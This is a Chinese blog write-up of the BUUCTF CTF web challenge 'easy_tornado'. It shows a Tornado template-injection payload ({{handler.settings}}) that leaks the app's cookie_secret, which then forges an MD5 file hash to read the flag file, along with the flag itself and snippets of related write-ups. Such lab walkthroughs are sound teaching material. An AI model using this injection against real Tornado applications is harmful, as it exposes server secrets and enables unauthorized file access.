buuctf-web-[护网杯 2018]easy_tornado1

最新推荐文章于 2024-11-04 22:26:34 发布
最新推荐文章于 2024-11-04 22:26:34 发布
阅读量210 收藏
点赞数
分类专栏: buuctfweb ctf 文章标签: ctf python tornado Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29977871/article/details/128730558
版权

打开环境

点击第一个链接,知道flag在/fllllllllllllag中

配合关键词tornado搜索得到提示

python ssti tornado render模板注入

打开第三个链接

看到链接内容

http://ceb8dfdd-5407-43fd-a190-51486130fab1.node4.buuoj.cn:81/file?filename=/hints.txt&filehash=89b44c932667ab065f61314843fd37a6

需要通过cookie_secret和filename进行请求伪造

当filehash错误时进入一个错误界面

http://ceb8dfdd-5407-43fd-a190-51486130fab1.node4.buuoj.cn:81/error?msg=Error

找到注入点

http://ceb8dfdd-5407-43fd-a190-51486130fab1.node4.buuoj.cn:81/error?msg={{escape}}

通过handler.settings进行注入

http://ceb8dfdd-5407-43fd-a190-51486130fab1.node4.buuoj.cn:81/error?msg={{handler.settings}}

得到cookie_secret为5fa731cd-0e31-45e7-b23c-16603a014436

根据提示进行计算

拼凑出payload

fliename为/fllllllllllllag

http://ceb8dfdd-5407-43fd-a190-51486130fab1.node4.buuoj.cn:81/file?filename=/fllllllllllllag&filehash=616185a0fe5ce55f598737d6516858a6

flag{f9ec63e3-a9aa-4857-bf67-5825ba80a73e}

mlws1900
关注
专栏目录
【网络安全 | CTF护网2018easy_tornado解题详析(Tornado之SSTI注入)
等风来
08-24 4055
提示:filename先被md5加密后,结合cookie_secret,再次被md5加密姿势进入页面给出三个链接:提示:filename先被md5加密后,结合cookie_secret,再次被md5加密先加密filename:得到:3bf9f6cf685a6dd8defadabfb41先加密filename:可知存在模板注入,而Tornado框架的附属文件handler.settings中存在cookie_secret故get传参:/error?msg={{handler.settings}}得到
BUUCTFweb 之 [护网 2018]easy_tornado
weixin_44164784的博客
04-07 406
打开出现三个目录: /flag.txt /welcome.txt /hints.txt 依次点开查看 flag.txt 告诉我们flag在哪里 点开welcome.txt 显示 render 之后百度:tornado render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页。漏洞在于用户对他可控的话,可以通过{{}}传递变量或者执行表达式 /hints.txt...
web buuctf [护网 2018]easy_tornado1
weixin_44214568的博客
03-12 4580
分解信息量: 1.题目名称是easy-tornadotornadopythonweb框架(web框架的产生是避免程序代码与html编码的编码混乱性,框架将传参过程进行独立) 2.打开一共三个链接,分别点开 /flag.txt 提示内容:flag in /fllllllllllllag ,意思就是flag在文件fllllllllllllag里面,需要考虑怎么进入文件里面 /welcome.txt 提示内容:render,render是tornado里面的渲染函数,就是对web网页界面进行编辑的函
BUUCTF Web [极客大挑战 2019]PHP & [护网 2018]easy_tornado 1
网安小趴菜
09-05 483
BUUCTF Web [极客大挑战 2019]PHP & [护网 2018]easy_tornado 1
BUUCTF[护网 2018]easy_tornado1-write up
m0_62851980的博客
04-23 990
知识点: SSTI(模板注入),render函数,Tornado框架(知识点在最后) 打开靶机,看到三个链接: 分别点进去: 注意每个链接的url: /file?filename=/xxx&filehash=32位MD5 根据flag.txt和hint.txt提示url的形式为:文件名+32位MD5 再看hint.txt的提示:md5(cookie_secret+md5(filename))。明显我们要先找到cookie_secret进行MD5加密,再和进行MD5加密后输入的文
BUUCTF-easy_tornado
wuerror的博客
07-07 3667
这题是2018护网原题的复现。 进去之后显示三个txt,每个点进去看看。内容如下: /flag.txt flag in /fllllllllllllag /welcome.txt render /hints.txt md5(cookie_secret+md5(filename)) 看看url,发现web9.buuoj.cn/file?filename=/flag.txt&fil...
BUUCTF---easy-tornado
weixin_44255856的博客
07-29 1720
打开链接发现存在3个txt文件 依次访问 flag.txt直接说明了,最终的flag在/fllllllllllllag文件下 hints.txt下提示是filehash,要是md5(cookie_secret+md5(filename))才可以结合/fllllllllllllag找到flag. 但是cookie_secret不知道 提示render. 谷歌发现render是python的一...
BUUCTF---web---[护网 2018]easy_tornado1
2201_75556700的博客
03-13 459
3.通过第一个信息可知,flag在文件名为/fllllllllllllag这个里面,第二个信息中的render是渲染函数,第三个个信息中是一个md5加解密,因为filename我们已经知道,所以我们需要找到cookie_secret的值。8.在这三个信息中我们唯一不知道的就是cookie_secert的值,tornado中msg该传什么值才能得到cookie_secert的值,是我们接下来要做的事情,查阅文档之后。6.需要利用msg的值进行传参,在tornado官方文档中提到。2.依次点开文件链接。
BUUCTFWeb:[护网 2018]easy_tornado1
Pai_Space
04-27 364
打开后是三个链接 第一个,flag 在/fllllllllllllag 中 render 渲染 测试发现渲染模板注入 第三个提示看着像 URL 跟着的 filehash 内容 /file?filename=/hints.txt&filehash=f0c7d9aa6db81d1ffd09e042949594dc 结合前面我们需要得到文件 /fllllllllllllag,缺少后面对应的 filehash filename /flllllll...
BUUCTF(WEB-writeup)[护网 2018]easy_tornado1 (做了好多题第一次开始写writeup)
2301_78919866的博客
05-26 345
CTF的题解
BUUCTF__[护网 2018]easy_tornado_题解
风过江南乱的博客
05-08 841
1
BUUCTF-WEB刷题记录-1
weixin_44145820的博客
04-06 934
目录[HCTF 2018]WarmUp[强网 2019]随便注[护网 2018]easy_tornado[SUCTF 2019]EasySQL[HCTF 2018]admin[RoarCTF 2019]Easy Calc[极客大挑战 2019]EasySQL[强网 2019]高明的黑客[极客大挑战 2019]Havefun[SUCTF 2019]CheckIn[CISCN2019 华北赛区 ...
BUUCTF web easy_tornado
H4ppyD0g的博客
09-19 770
网站存在以下三个目录 /flag.txt flag in /fllllllllllllag /welcome.txt render 知识点1: render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。 /hints.txt md5(cookie_secret+md5(filename)) 随便点进去一个,发现url变为?filename=/hin...
自助餐剩余食品识别图像分割系统:教学内容全覆盖
sgcsdn99的博客
11-04 884
数据集信息展示在本研究中,我们使用的数据集名为“9_5_Merged”,该数据集专门用于训练改进YOLOv8-seg的自助餐剩余食品识别图像分割系统。该数据集包含71个类别,涵盖了丰富多样的食品种类,旨在提高模型对不同类型剩余食品的识别和分割能力。通过对这些类别的细致划分,我们希望能够实现更高精度的图像分割,进而优化自助餐剩余食品的管理和利用。
Day21包和模块
weixin_50199478的博客
10-30 628
一个.py文件就是一个模块。模块是含有一系列数据、函数、类等的程序。包是将模块以文件夹的组织形式进行分组管理的方法,以便更好地组织和管理相关模块。包是一个包含一个特殊的__init__.py文件的目录。
Python 类和对象
疯一样的码农
11-04 566
Python 中,类是一个对象创建的蓝图。它指定了对象(实例)将具有的属性和方法的集合。类通过封装数据和行为,促进了代码的组织、复用和模块化。使用类可以建模现实世界中的对象,定义其属性,并更有效地控制应用程序的复杂性。在 Python 中,一切都是对象,所有的数据类型和结构都是特定类的实例。对象是类的实例,具有用于修改数据的方法和存储数据的属性。理解对象对于掌握 Python 中的面向对象编程(OOP)范式至关重要。
探索 Python 的新天地:Helium 库揭秘
AIGC搞起
11-04 578
在自动化测试和网页交互的领域,Selenium 是一个强大的工具,但它的复杂性和陡峭的学习曲线让许多开发者望而却步。Helium库的出现,以其简洁的 API 和易用性,为 Python 开发者提供了一个新的选择。它不仅简化了 Selenium 的使用,还自带 WebDriver,减少了配置的复杂性。Helium 以其简洁的 API 和易用性,为 Python 开发者提供了一个强大的 Selenium 替代方案。它不仅减少了代码量,还简化了 WebDriver 的管理,使得自动化测试和网页交互变得更加容易。
Python中的模块
piziliul的博客
11-04 167
创建introduce.py模块文件。创建my_info.py模块文件。
【Java知识】Java基础-对象排序的实现
最新发布
wendao76的专栏
11-04 127
方法,并且需要提供一个比较器(Comparator)来定义对象的排序逻辑。这些示例展示了如何在Java中对对象进行排序,无论是使用列表还是数组,都可以灵活地使用比较器来定义排序规则。在Java中,对象的排序通常涉及到使用。
[护网 2018]easy_tornado
03-16
护网 2018 中的 easy_tornado 题目是一道Web安全题目。根据题目描述,该网站使用了 Tornado 框架搭建,并且存在一个可以进行任意代码执行的漏洞。需要我们利用这个漏洞,在服务器上执行指定的命令。 解决这道题目...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值